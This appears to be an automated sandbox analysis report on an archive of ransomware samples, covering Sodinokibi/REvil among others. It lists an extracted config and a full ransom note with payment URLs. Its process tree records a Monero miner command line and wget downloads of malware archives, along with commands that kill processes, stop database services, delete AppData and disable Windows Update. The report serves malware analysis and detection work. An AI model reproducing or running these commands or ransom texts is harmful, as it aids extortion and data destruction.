Analysis

  • max time kernel
    108s
  • max time network
    267s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-10-2024 16:24

General

  • Target

    RNSM00420.7z

  • Size

    32.7MB

  • MD5

    09015bf08b2616e38427b822368687df

  • SHA1

    58d64a19086431ae53383a695c924c8e1c47a02c

  • SHA256

    45d0cb04b923fc36376ddcc4cf26fbab58cf39415ac746570ae12330895d0d52

  • SHA512

    8595d53065c57b76687887e699940bfc2080397a4e2a014c5f28c0b08b00aa0d855ae1570176e7402c4a165cc2d394526beebd8bac14c395f195c523e1fa7e01

  • SSDEEP

    786432:495ASpBWrOfcbWHS3Ab0JVafIP9Ih4VPjT6camC:kgOfLyE0JAf09wMf63

Malware Config

Extracted

Family

sodinokibi

Botnet

$2a$10$wzUcscyDeDfub4FJZW9a1Og8YAK9QjX15adMJwmCiN0FDxbjQFshK

Campaign

6714

Decoy

tanzprojekt.com

vitalyscenter.es

ihr-news.jp

limassoldriving.com

hellohope.com

synlab.lt

comarenterprises.com

ccpbroadband.com

sloverse.com

herbstfeststaefa.ch

iwelt.de

schraven.de

embracinghiscall.com

iphoneszervizbudapest.hu

ilso.net

milsing.hr

ctrler.cn

xltyu.com

lange.host

monark.com

Attributes
  • net

    false

  • pid

    $2a$10$wzUcscyDeDfub4FJZW9a1Og8YAK9QjX15adMJwmCiN0FDxbjQFshK

  • prc

    firefox

    infopath

    onenote

    wordpad

    winword

    oracle

    mydesktopqos

    thebat

    tbirdconfig

    synctime

    powerpnt

    ocomm

    ocautoupds

    dbsnmp

    thunderbird

    msaccess

    visio

    sql

    sqbcoreservice

    xfssvccon

    dbeng50

    mydesktopservice

    mspub

    ocssd

    encsvc

    steam

    excel

    isqlplussvc

    outlook

    agntsvc

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decoder.re/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    6714

  • svc

    backup

    mepocs

    veeam

    memtas

    vss

    sophos

    svc$

    sql

Signatures

  • Disables service(s) 3 TTPs
  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modiloader family
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Sodinokibi family
  • VashSorena Golang binary 1 IoCs
  • VashSorena Ransomware

    Ransomware family with multiple versions/spinoffs. Decryption of files is generally possible without paying the ransom.

  • Vashsorena family
  • ModiLoader Second Stage 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00420.7z"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1928
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:1512
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      1⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:4372
      • C:\Windows\system32\taskmgr.exe
        "C:\Windows\system32\taskmgr.exe" /1
        2⤵
        • Checks SCSI registry key(s)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:3296
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4160
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2744
        • C:\Users\Admin\Desktop\00420\HEUR-Trojan-Ransom.MSIL.Blocker.gen-e778a7b0716d179b56333f12543bf8e9a1c95e65f89d3f2314cac0e63ef9761e.exe
          HEUR-Trojan-Ransom.MSIL.Blocker.gen-e778a7b0716d179b56333f12543bf8e9a1c95e65f89d3f2314cac0e63ef9761e.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:1788
          • C:\Users\Admin\AppData\Local\Temp\Mmo Injector.exe
            "C:\Users\Admin\AppData\Local\Temp\Mmo Injector.exe"
            4⤵
              PID:4104
            • C:\Users\Admin\AppData\Local\Temp\Mmo Injector2.exe
              "C:\Users\Admin\AppData\Local\Temp\Mmo Injector2.exe"
              4⤵
                PID:3504
                • C:\Users\Admin\AppData\Roaming\WinXmr.exe
                  "C:\Users\Admin\AppData\Roaming\WinXmr.exe"
                  5⤵
                    PID:2652
                    • C:\Windows\explorer.exe
                      C:\Windows\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:3333 --user=49daamBW2HX2Eh973Wz7FtVyfVwGE4Ejp9K1hbXvQ7PKFthxxnM8MKKcXg4Bbxuc6yLo2xPf2aQPpaZZXwh4BGKGBBfJdWZ --pass=y --cpu-max-threads-hint=60 --donate-level=5
                      6⤵
                        PID:5300
                • C:\Users\Admin\Desktop\00420\HEUR-Trojan-Ransom.MSIL.Encoder.gen-5469182495d92a5718e0e1dcdf371e92b79724e427050154f318de693d341c89.exe
                  HEUR-Trojan-Ransom.MSIL.Encoder.gen-5469182495d92a5718e0e1dcdf371e92b79724e427050154f318de693d341c89.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4004
                  • \??\c:\windows\system32\cmstp.exe
                    "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\0kbdtgjn.inf
                    4⤵
                      PID:1504
                  • C:\Users\Admin\Desktop\00420\HEUR-Trojan-Ransom.MSIL.Makop.gen-2f9a41b230e25e27518dfbc53c9ca85320c179e1e6ea2911d3885e143e7e0db8.exe
                    HEUR-Trojan-Ransom.MSIL.Makop.gen-2f9a41b230e25e27518dfbc53c9ca85320c179e1e6ea2911d3885e143e7e0db8.exe
                    3⤵
                    • Executes dropped EXE
                    PID:2180
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c timeout 1
                      4⤵
                        PID:2024
                    • C:\Users\Admin\Desktop\00420\HEUR-Trojan-Ransom.MSIL.Zerber.gen-8eabc1aaecbd3a2ea45eba91b72b67c65ba5a407ed5e30ad4a1f9a52d4f155fc.exe
                      HEUR-Trojan-Ransom.MSIL.Zerber.gen-8eabc1aaecbd3a2ea45eba91b72b67c65ba5a407ed5e30ad4a1f9a52d4f155fc.exe
                      3⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:2500
                    • C:\Users\Admin\Desktop\00420\HEUR-Trojan-Ransom.Win32.Blocker.gen-3c7c5113e6c4f8f6d5811f866007237b7ad3a28fa6c26eaa26c1ea60db89ae4f.exe
                      HEUR-Trojan-Ransom.Win32.Blocker.gen-3c7c5113e6c4f8f6d5811f866007237b7ad3a28fa6c26eaa26c1ea60db89ae4f.exe
                      3⤵
                        PID:3876
                        • C:\Users\Admin\Documents\reg.exe
                          "C:\Users\Admin\Documents\reg.exe"
                          4⤵
                            PID:5248
                            • C:\Users\Admin\Documents\s.exe
                              "C:\Users\Admin\Documents\s.exe"
                              5⤵
                                PID:5860
                          • C:\Users\Admin\Desktop\00420\HEUR-Trojan-Ransom.Win32.Encoder.gen-3821124354be3b5845958605bbe35a71a0f67294082d582b7a8db6eb9e4b87b1.exe
                            HEUR-Trojan-Ransom.Win32.Encoder.gen-3821124354be3b5845958605bbe35a71a0f67294082d582b7a8db6eb9e4b87b1.exe
                            3⤵
                              PID:3188
                            • C:\Users\Admin\Desktop\00420\HEUR-Trojan-Ransom.Win32.Generic-1d6f7662f9b034063d694a32d84c538e32da8adb6a52b77eeb3aaec3871b5e47.exe
                              HEUR-Trojan-Ransom.Win32.Generic-1d6f7662f9b034063d694a32d84c538e32da8adb6a52b77eeb3aaec3871b5e47.exe
                              3⤵
                                PID:1608
                                • C:\Windows\system32\cmd.exe
                                  cmd /C "label F: Encrypted"
                                  4⤵
                                    PID:4184
                                  • C:\Windows\system32\cmd.exe
                                    cmd /C "label C: Encrypted"
                                    4⤵
                                      PID:4376
                                      • C:\Windows\system32\label.exe
                                        label C: Encrypted
                                        5⤵
                                          PID:4584
                                      • C:\Windows\system32\cmd.exe
                                        cmd /C "reg add HKEY_CLASSES_ROOT\.lucifer\DefaultIcon /t REG_SZ /d %SystemRoot%\System32\SHELL32.dll,152 /f"
                                        4⤵
                                          PID:5928
                                          • C:\Windows\system32\reg.exe
                                            reg add HKEY_CLASSES_ROOT\.lucifer\DefaultIcon /t REG_SZ /d C:\Windows\System32\SHELL32.dll,152 /f
                                            5⤵
                                              PID:5472
                                          • C:\Windows\system32\cmd.exe
                                            cmd /C "taskkill /F /IM sqlservr.exe /T"
                                            4⤵
                                              PID:5168
                                              • C:\Windows\system32\taskkill.exe
                                                taskkill /F /IM sqlservr.exe /T
                                                5⤵
                                                • Kills process with taskkill
                                                PID:5956
                                            • C:\Windows\system32\cmd.exe
                                              cmd /C "taskkill /F /IM sqlceip.exe /T"
                                              4⤵
                                                PID:4184
                                                • C:\Windows\system32\taskkill.exe
                                                  taskkill /F /IM sqlceip.exe /T
                                                  5⤵
                                                  • Kills process with taskkill
                                                  PID:1504
                                              • C:\Windows\system32\cmd.exe
                                                cmd /C "taskkill /F /IM sqlwriter.exe /T"
                                                4⤵
                                                  PID:4788
                                                  • C:\Windows\system32\taskkill.exe
                                                    taskkill /F /IM sqlwriter.exe /T
                                                    5⤵
                                                    • Kills process with taskkill
                                                    PID:5292
                                                • C:\Windows\system32\cmd.exe
                                                  cmd /C "taskkill /F /IM 0xd.exe /T"
                                                  4⤵
                                                    PID:5404
                                                    • C:\Windows\system32\taskkill.exe
                                                      taskkill /F /IM 0xd.exe /T
                                                      5⤵
                                                      • Kills process with taskkill
                                                      PID:4656
                                                  • C:\Windows\system32\cmd.exe
                                                    cmd /C "rmdir C:\Users\Admin\AppData /s /q"
                                                    4⤵
                                                      PID:764
                                                    • C:\Windows\system32\cmd.exe
                                                      cmd /C "rmdir C:\Users\Default\AppData /s /q"
                                                      4⤵
                                                        PID:2748
                                                      • C:\Windows\system32\cmd.exe
                                                        cmd /C "rmdir C:\Users\Public\AppData /s /q"
                                                        4⤵
                                                          PID:4088
                                                        • C:\Windows\system32\cmd.exe
                                                          cmd /C "attrib +h +s Crypto.exe"
                                                          4⤵
                                                          • Hide Artifacts: Hidden Files and Directories
                                                          PID:1920
                                                          • C:\Windows\system32\attrib.exe
                                                            attrib +h +s Crypto.exe
                                                            5⤵
                                                            • Views/modifies file attributes
                                                            PID:4656
                                                        • C:\Windows\system32\cmd.exe
                                                          cmd /C "net stop MSSQL$SQLEXPRESS"
                                                          4⤵
                                                            PID:2420
                                                            • C:\Windows\system32\net.exe
                                                              net stop MSSQL$SQLEXPRESS
                                                              5⤵
                                                                PID:5500
                                                                • C:\Windows\system32\net1.exe
                                                                  C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS
                                                                  6⤵
                                                                    PID:5424
                                                              • C:\Windows\system32\cmd.exe
                                                                cmd /C "NET stop MSSQLSERVER"
                                                                4⤵
                                                                  PID:5468
                                                                  • C:\Windows\system32\net.exe
                                                                    NET stop MSSQLSERVER
                                                                    5⤵
                                                                      PID:5444
                                                                      • C:\Windows\system32\net1.exe
                                                                        C:\Windows\system32\net1 stop MSSQLSERVER
                                                                        6⤵
                                                                          PID:1060
                                                                    • C:\Windows\system32\cmd.exe
                                                                      cmd /C "net stop SQLSERVERAGENT"
                                                                      4⤵
                                                                        PID:4588
                                                                        • C:\Windows\system32\net.exe
                                                                          net stop SQLSERVERAGENT
                                                                          5⤵
                                                                            PID:5672
                                                                            • C:\Windows\system32\net1.exe
                                                                              C:\Windows\system32\net1 stop SQLSERVERAGENT
                                                                              6⤵
                                                                                PID:3480
                                                                          • C:\Windows\system32\cmd.exe
                                                                            cmd /C "net stop mysql"
                                                                            4⤵
                                                                              PID:6024
                                                                              • C:\Windows\system32\net.exe
                                                                                net stop mysql
                                                                                5⤵
                                                                                  PID:5968
                                                                                  • C:\Windows\system32\net1.exe
                                                                                    C:\Windows\system32\net1 stop mysql
                                                                                    6⤵
                                                                                      PID:5988
                                                                              • C:\Users\Admin\Desktop\00420\HEUR-Trojan-Ransom.Win32.Generic-5c93fd17f804ee4268e7712b6f070f55a438547ee3fe10b67870806740d1e304.exe
                                                                                HEUR-Trojan-Ransom.Win32.Generic-5c93fd17f804ee4268e7712b6f070f55a438547ee3fe10b67870806740d1e304.exe
                                                                                3⤵
                                                                                  PID:5036
                                                                                • C:\Users\Admin\Desktop\00420\HEUR-Trojan-Ransom.Win32.Hellokit.gen-9a7daafc56300bd94ceef23eac56a0735b63ec6b9a7a409fb5a9b63efe1aa0b0.exe
                                                                                  HEUR-Trojan-Ransom.Win32.Hellokit.gen-9a7daafc56300bd94ceef23eac56a0735b63ec6b9a7a409fb5a9b63efe1aa0b0.exe
                                                                                  3⤵
                                                                                    PID:2908
                                                                                  • C:\Users\Admin\Desktop\00420\Trojan-Ransom.Win32.Blocker.mnap-40f18fbf099097fcface5cbf159ec9b4c207767e4f58c73b976360c85a7d45e0.exe
                                                                                    Trojan-Ransom.Win32.Blocker.mnap-40f18fbf099097fcface5cbf159ec9b4c207767e4f58c73b976360c85a7d45e0.exe
                                                                                    3⤵
                                                                                      PID:2264
                                                                                      • C:\Users\Admin\Desktop\00420\tpvpyme.exe
                                                                                        "C:\Users\Admin\Desktop\00420\tpvpyme.exe"
                                                                                        4⤵
                                                                                          PID:5152
                                                                                          • C:\Windows\splwow64.exe
                                                                                            C:\Windows\splwow64.exe 12288
                                                                                            5⤵
                                                                                              PID:4004
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00420\USB_Habilitar.bat" "
                                                                                              5⤵
                                                                                                PID:5636
                                                                                                • C:\Windows\SysWOW64\regedit.exe
                                                                                                  REGEDIT /S "C:\Users\Admin\Desktop\00420\USB_habilitar.reg
                                                                                                  6⤵
                                                                                                  • Runs .reg file with regedit
                                                                                                  PID:5672
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00420\windowsUpdate.bat" "
                                                                                                5⤵
                                                                                                  PID:4852
                                                                                                  • C:\Windows\SysWOW64\regedit.exe
                                                                                                    REGEDIT /S "C:\Users\Admin\Desktop\00420\windowsUpdate.reg
                                                                                                    6⤵
                                                                                                    • Runs .reg file with regedit
                                                                                                    PID:4232
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                  5⤵
                                                                                                    PID:5952
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update /v AUOptions /t REG_DWORD /d 1 /f
                                                                                                    5⤵
                                                                                                      PID:5312
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c sc config wuauserv start= disabled
                                                                                                      5⤵
                                                                                                        PID:5524
                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                          sc config wuauserv start= disabled
                                                                                                          6⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:4556
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c net stop wuauserv
                                                                                                        5⤵
                                                                                                          PID:5852
                                                                                                    • C:\Users\Admin\Desktop\00420\Trojan-Ransom.Win32.Cryakl.awf-12efd85d31a02fafe099a1e6d386e7f8f60c98bb07245048bab2b954c38b4939.exe
                                                                                                      Trojan-Ransom.Win32.Cryakl.awf-12efd85d31a02fafe099a1e6d386e7f8f60c98bb07245048bab2b954c38b4939.exe
                                                                                                      3⤵
                                                                                                        PID:3340
                                                                                                      • C:\Users\Admin\Desktop\00420\Trojan-Ransom.Win32.Cryptor.ebt-29dc75145a691eeebbafac2f4b1c18aa48d87f78bcf07c4221d8698510799a9e.exe
                                                                                                        Trojan-Ransom.Win32.Cryptor.ebt-29dc75145a691eeebbafac2f4b1c18aa48d87f78bcf07c4221d8698510799a9e.exe
                                                                                                        3⤵
                                                                                                          PID:1896
                                                                                                          • C:\Users\Admin\Desktop\00420\ZXCxmULFHrep.exe
                                                                                                            "C:\Users\Admin\Desktop\00420\ZXCxmULFHrep.exe" 9 REP
                                                                                                            4⤵
                                                                                                              PID:5272
                                                                                                          • C:\Users\Admin\Desktop\00420\Trojan-Ransom.Win32.Gen.aafg-d23b5af1e67735bc73fb117373e9dbc240c5837a20a0e0ccbb8f36fc964eff1c.exe
                                                                                                            Trojan-Ransom.Win32.Gen.aafg-d23b5af1e67735bc73fb117373e9dbc240c5837a20a0e0ccbb8f36fc964eff1c.exe
                                                                                                            3⤵
                                                                                                              PID:2092
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9F92.tmp\9FA2.tmp\9FA3.bat C:\Users\Admin\Desktop\00420\Trojan-Ransom.Win32.Gen.aafg-d23b5af1e67735bc73fb117373e9dbc240c5837a20a0e0ccbb8f36fc964eff1c.exe"
                                                                                                                4⤵
                                                                                                                  PID:636
                                                                                                              • C:\Users\Admin\Desktop\00420\Trojan-Ransom.Win32.Gen.zwm-2bc59c59fb0af3fe338d65723edd92ec2f3137e9b82c029f035d44222e62c586.exe
                                                                                                                Trojan-Ransom.Win32.Gen.zwm-2bc59c59fb0af3fe338d65723edd92ec2f3137e9b82c029f035d44222e62c586.exe
                                                                                                                3⤵
                                                                                                                  PID:4024
                                                                                                                • C:\Users\Admin\Desktop\00420\Trojan-Ransom.Win32.Gimemo.bcdt-4bf2e6d05f7148112a112bfb25e214e58bc42cbbeca98b48d8004e11845c44d1.exe
                                                                                                                  Trojan-Ransom.Win32.Gimemo.bcdt-4bf2e6d05f7148112a112bfb25e214e58bc42cbbeca98b48d8004e11845c44d1.exe
                                                                                                                  3⤵
                                                                                                                    PID:4536
                                                                                                                  • C:\Users\Admin\Desktop\00420\Trojan-Ransom.Win32.PolyRansom.bvls-e8d497900bb056042fb1516f886717d5895ec8eadafeaf78949a1f46b7ac09f5.exe
                                                                                                                    Trojan-Ransom.Win32.PolyRansom.bvls-e8d497900bb056042fb1516f886717d5895ec8eadafeaf78949a1f46b7ac09f5.exe
                                                                                                                    3⤵
                                                                                                                      PID:752
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\wget.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wget.exe" https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip -q
                                                                                                                        4⤵
                                                                                                                          PID:4028
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\wget.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wget.exe" https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip -q
                                                                                                                          4⤵
                                                                                                                            PID:4060
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\wget.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wget.exe" https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zip -q
                                                                                                                            4⤵
                                                                                                                              PID:4184
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\wget.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wget.exe" https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zip -q
                                                                                                                              4⤵
                                                                                                                                PID:3012
                                                                                                                            • C:\Users\Admin\Desktop\00420\Trojan-Ransom.Win32.Sodin.aea-d0e075a9346acbeca7095df2fc5e7c28909961184078e251f737f09b8ef892b6.exe
                                                                                                                              Trojan-Ransom.Win32.Sodin.aea-d0e075a9346acbeca7095df2fc5e7c28909961184078e251f737f09b8ef892b6.exe
                                                                                                                              3⤵
                                                                                                                                PID:1144
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            cmd /c start C:\Windows\temp\35qrww00.exe
                                                                                                                            1⤵
                                                                                                                              PID:4780
                                                                                                                              • C:\Windows\temp\35qrww00.exe
                                                                                                                                C:\Windows\temp\35qrww00.exe
                                                                                                                                2⤵
                                                                                                                                  PID:4840
                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                taskkill /IM cmstp.exe /F
                                                                                                                                1⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:1744
                                                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                                                1⤵
                                                                                                                                  PID:5508
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
                                                                                                                                  1⤵
                                                                                                                                    PID:5376

                                                                                                                                  Network

                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                  Replay Monitor

                                                                                                                                  Loading Replay Monitor...

                                                                                                                                  Downloads

                                                                                                                                  • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                    MD5

                                                                                                                                    d2fb266b97caff2086bf0fa74eddb6b2

                                                                                                                                    SHA1

                                                                                                                                    2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

                                                                                                                                    SHA256

                                                                                                                                    b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

                                                                                                                                    SHA512

                                                                                                                                    c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

                                                                                                                                  • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

                                                                                                                                    Filesize

                                                                                                                                    4B

                                                                                                                                    MD5

                                                                                                                                    f49655f856acb8884cc0ace29216f511

                                                                                                                                    SHA1

                                                                                                                                    cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

                                                                                                                                    SHA256

                                                                                                                                    7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

                                                                                                                                    SHA512

                                                                                                                                    599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

                                                                                                                                  • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                                                                                                                                    Filesize

                                                                                                                                    944B

                                                                                                                                    MD5

                                                                                                                                    6bd369f7c74a28194c991ed1404da30f

                                                                                                                                    SHA1

                                                                                                                                    0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

                                                                                                                                    SHA256

                                                                                                                                    878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

                                                                                                                                    SHA512

                                                                                                                                    8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\FP9169.tmp

                                                                                                                                    Filesize

                                                                                                                                    177B

                                                                                                                                    MD5

                                                                                                                                    bd451cc03b46529eba60681ca0ee3ba5

                                                                                                                                    SHA1

                                                                                                                                    7f7e41d374a84a8ce5e34f92df943d445dd64322

                                                                                                                                    SHA256

                                                                                                                                    591b82fdf19c417a9fd7034f4e1f7e5e9b294ce722304d28ef6d4d6ea389fe32

                                                                                                                                    SHA512

                                                                                                                                    abb2452a3e515e46794fb20b4f1fbd187b44cab53ffe5cd13564b7334c659452f59a6ac40e1ab78e2a39cde086dc6fbd6ae5dfa736c420a5f42684926f6cfc65

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Mmo Injector.exe

                                                                                                                                    Filesize

                                                                                                                                    3.6MB

                                                                                                                                    MD5

                                                                                                                                    c5c855c3f96a72720b4c1c20ab84d355

                                                                                                                                    SHA1

                                                                                                                                    6572d279efbd62f8ad3a5a14b08dbe03bbdd72b0

                                                                                                                                    SHA256

                                                                                                                                    34bba830771f1fb839c08e31a9c3bffaf4c634baf0764223ef665e20c7c397ff

                                                                                                                                    SHA512

                                                                                                                                    0b789a5c6c5dfe513eeee25705249a42018570b3dd8e5e2541efd66399e15bdf5dd2211515aa20ec68c54fdb6a4158fa5bef1765fb5561746b1072efa75d7767

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Mmo Injector2.exe

                                                                                                                                    Filesize

                                                                                                                                    2.1MB

                                                                                                                                    MD5

                                                                                                                                    27fa5ae5be3c4e8cb3ae0b9c90a2ae7a

                                                                                                                                    SHA1

                                                                                                                                    af4c16922243cd01f51d1a17f6dec808e141cae3

                                                                                                                                    SHA256

                                                                                                                                    92150e0a6976ae9da09967204d6181a3745d1b2af6a2e1b17a53f889c78d7dc5

                                                                                                                                    SHA512

                                                                                                                                    1e2673cc0dec5bacb7c4a4220a26111e0382d2fdeb63d3c064605531574a02bb15a79592682387dd999f129ec4fffc4a7653cf858b9efccc05ad34db3abc38cb

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\wget.exe

                                                                                                                                    Filesize

                                                                                                                                    3.7MB

                                                                                                                                    MD5

                                                                                                                                    3dadb6e2ece9c4b3e1e322e617658b60

                                                                                                                                    SHA1

                                                                                                                                    66999fd67abccff7479f1e6005741368ede7c3de

                                                                                                                                    SHA256

                                                                                                                                    32e9cdc62dd035dfd49da7eb3351829fdee95aa6bdb5663ab40f3911ea7cece1

                                                                                                                                    SHA512

                                                                                                                                    3c20164d75954cbbb849e122cb4eb65b76ba99532569f1b0acf300febe1c8884f5fd89299c8d05ef81cdf50b486958e5a926be3ac98e7a100b4d8b22fcb7902d

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_atcf4dbx.4m2.ps1

                                                                                                                                    Filesize

                                                                                                                                    60B

                                                                                                                                    MD5

                                                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

